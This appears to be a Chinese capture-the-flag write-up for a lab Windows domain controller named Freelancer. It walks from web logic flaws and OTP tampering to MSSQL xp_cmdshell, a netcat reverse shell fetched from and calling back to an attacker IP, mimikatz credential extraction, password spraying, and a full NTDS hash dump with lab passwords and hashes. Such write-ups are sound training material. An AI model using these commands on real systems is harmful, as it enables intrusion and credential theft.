基本信息

端口扫描

80和一些常规windows端口:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
$ nmap -sC -sV 10.10.11.5
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-03 14:06 CST
Nmap scan report for freelancer.htb (10.10.11.5)
Host is up (0.14s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http nginx 1.25.5
|_http-title: Freelancer - Job Board & Hiring platform
|_http-server-header: nginx/1.25.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3269/tcp open tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 4h53m58s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-06-03T11:02:12
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 156.22 seconds

80

需要加hosts:

1
10.10.11.5 freelancer.htb

一个就活相关网站:

目录扫描

目录扫描可以发现admin

1
2
3
4
5
gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://freelancer.htb/ --exclude-length 197

/about (Status: 301) [Size: 0] [--> /about/]
/admin (Status: 301) [Size: 0] [--> /admin/]
/contact (Status: 301) [Size: 0] [--> /contact/]

Employer

页面上有两个注册入口,但Employer注册后是默认未激活状态:

recovery

这里是处理逻辑上的错误,未激活的账号虽然不能登录,但可以选择忘记密码,输入注册时的安全问题答案后设置新密码,这时候账户被自动激活,可以正常登录:

OTP QR-CODE

然后可以发现一个使用qr-code登录的功能:

分析qrcode内容,是这样的链接,中间一段base64看起来是用户id,后面是otp的md5:

1
2
3
4
http://freelancer.htb/accounts/login/otp/MTAwMTM=/0268a3f41547b64009d5264a068b395c/

echo MTAwMTM= | base64 -d
10013

job

employer可以发布工作,测试发布,然后查看job信息可以看到employer信息查看接口,使用用户id:

users

这个接口存在idor,枚举可以发现admin的id为2,以及其他一些用户:

1
2
3
4
5
6
7
8
9
10
11
12
13
admin
tomHazard
martin1234
crista.W
Camellia19970
lisa.Ar
SaraArkhader
maya001
ItachiUchiha
Philippos
Jonathon.R
JohntheCarter
Markos

admin

这里又是一个逻辑问题,OTP代码没和用户id绑定,直接修改中间用户id部分,访问到admin用户:

1
http://freelancer.htb/accounts/login/otp/Mg==/239e3746d021264f38bdd160f52a419c/

现在我们可以访问admin,是django管理后台:

SQL Terminal

可以看到有一个SQL Terminal可以直接执行sql:

后面就是sql一步步枚举模拟,然后xp_cmdshell:

1
2
3
4
5
6
7
8
9
SELECT SYSTEM_USER;
Freelancer_webapp_user

SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';
sa;

EXECUTE AS LOGIN = 'sa';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

EXECUTE AS LOGIN = 'sa';EXEC xp_cmdshell whoami;

sql_svc

然后就是执行命令获取shell,有杀软,简单的nc获取shell:

1
2
3
4
powershell -exec bypass -c 'wget http://10.10.14.10:7777/nc.exe -O C:\windows\Tasks\nc.exe'
EXECUTE AS LOGIN = 'sa';EXEC xp_cmdshell 'powershell -enc cABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwAgAGIAeQBwAGEAcwBzACAALQBjACAAJwB3AGcAZQB0ACAAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADQALgAxADAAOgA3ADcANwA3AC8AbgBjAC4AZQB4AGUAIAAtAE8AIABDADoAXAB3AGkAbgBkAG8AdwBzAFwAVABhAHMAawBzAFwAbgBjAC4AZQB4AGUAJwA=';

EXECUTE AS LOGIN = 'sa';EXEC xp_cmdshell 'C:\windows\Tasks\nc.exe -e powershell.exe 10.10.14.10 4444';

信息

然后在sql_svc的download目录中mssql相关目录,一个配置文件中得到一些密码:

1
2
SQLSVCPASSWORD="IL0v3ErenY3ager"
SAPWD="t3mp0r@ryS@PWD"

mikasaAckerman & user flag

简单尝试可以发现mikasaAckerman用户复用了其中一个密码:

1
.\RunasCs.exe mikasaAckerman IL0v3ErenY3ager -r 10.10.14.37:4444 powershell

MEMORY.7z

mikasaAckerman桌面有个7z文件,根据邮件和7z文件名可以知道这是内存dump,那就下载到本地分析:

1
2
3
4
5
~/Tools/impacket/bin/python3 ~/Tools/impacket/examples/smbserver.py -smb2support miao .  -username miao -password miao

net use v: \\10.10.14.37\miao miao /u:miao

copy MEMORY.7z v:\

解压之后就是内存dump,标准的volatility+mimikatz,或者windbg+mimikatz:

1
2
3
4
5
6
.load C:\mimikatz_trunk\x64\mimilib.dll

!process 0 0 lsass.exe
ffffbc83a93e7080
.process /r /p ffffbc83a93e7080
!mimikatz

windbg+mimikatz有点问题,显示的不全,可以用MemProcFS加插件:

1
.\MemProcFS.exe -device ..\MEMORY.DMP

dumps

从内存dump中提取出一些信息:

1
2
3
4
5
Administrator acb3617b6b9da5dc7778092bdea6f3b8 v3ryS0l!dP@sswd#29
liza.kazanof 6bc05d2a5ebf34f5b563ff233199dc5a
# 解出来是 RockYou!

PWN3D#l0rr@Armessa19

jmartinez path

根据内存中得到的密码规则,生成密码字典,枚举,发现jmartinez的密码,从这个用户开始有几种不同方式:

1
2
3
4
5
6
7
v3ryS0l!dP@sswd#29

for i in $(seq 1 100); do echo 'v3ryS0l!dP@sswd#'$i; done > passwords.txt

NetExec smb freelancer.htb -u users.txt -p passwords.txt

v3ryS0l!dP@sswd#35

jmartinez在Account Operators组,可以直接操作其他账号

另外还有一种服务提权方式:

1
2
3
sc.exe stop VMTools
sc.exe config VMTools binpath="cmd /c net localgroup administrators jmartinez /add"
sc.exe start VMTools

lorra199 path

另一个密码包含lorra199的变形,就是他的密码。登录lorra199:

1
evil-winrm -u lorra199 -p 'PWN3D#l0rr@Armessa199' -i freelancer.htb

AD Recycle Bin

lorra199在AD Recycle Bin组中,很早之前的Cascade也出现过这部分:

可以成功恢复liza.kazanof,然后使用前面内存中得到的密码切换过去:

1
2
3
4
5
Get-ADObject -ldapFilter:"(msDS-LastKnownRDN=*)" -IncludeDeletedObjects

Restore-ADObject -Identity "ebe15df5-e265-45ec-b7fc-359877217138" -NewName "Liza Kazanof2" -TargetPath "CN=Users,DC=freelancer,DC=htb"

.\RunasCs.exe liza.kazanof RockYou! -r 10.10.14.37:4444 powershell

liza.kazanof

liza.kazanof有SeBackupPrivilege权限,直接卷影备份ntds和system然后dump即可:

就按照里面的步骤备份ntds和system,然后下载到本地dump:

root flag

得到的Administrator hash登录:

1
evil-winrm -u Administrator -H 0039318f1e8274633445bce32ad1a290 -i freelancer.htb

hashdump

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
~/Tools/impacket/bin/python3 ~/Tools/impacket/examples/secretsdump.py -ntds ntds.dit -system system  LOCAL

Administrator:500:aad3b435b51404eeaad3b435b51404ee:0039318f1e8274633445bce32ad1a290:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:89851d57d9c8cc8addb66c59b83a4379:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d238e0bfa17d575038efc070187a91c2:::
freelancer.htb\mikasaAckerman:1105:aad3b435b51404eeaad3b435b51404ee:e8d62c7d57e5d74267ab6feb2f662674:::
sshd:1108:aad3b435b51404eeaad3b435b51404ee:c1e83616271e8e17d69391bdcd335ab4:::
SQLBackupOperator:1112:aad3b435b51404eeaad3b435b51404ee:c4b746db703d1af5575b5c3d69f57bab:::
sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:af7b9d0557964265115d018b5cff6f8a:::
DATACENTER-2019$:1115:aad3b435b51404eeaad3b435b51404ee:7a8b0efef4571ec55cc0b9f8cb73fdcf:::
lorra199:1116:aad3b435b51404eeaad3b435b51404ee:67d4ae78a155aab3d4aa602da518c051:::
freelancer.htb\maya.artmes:1124:aad3b435b51404eeaad3b435b51404ee:22db50a324b9a34ea898a290c1284e25:::
freelancer.htb\michael.williams:1126:aad3b435b51404eeaad3b435b51404ee:af7b9d0557964265115d018b5cff6f8a:::
freelancer.htb\sdavis:1127:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\d.jones:1128:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\jen.brown:1129:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\taylor:1130:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\jmartinez:1131:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\olivia.garcia:1133:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\dthomas:1134:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\sophia.h:1135:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\Ethan.l:1138:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\wwalker:1141:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\jgreen:1142:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\evelyn.adams:1143:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\hking:1144:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\alex.hill:1145:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\samuel.turner:1146:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\ereed:1149:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\leon.sk:1151:aad3b435b51404eeaad3b435b51404ee:af7b9d0557964265115d018b5cff6f8a:::

参考资料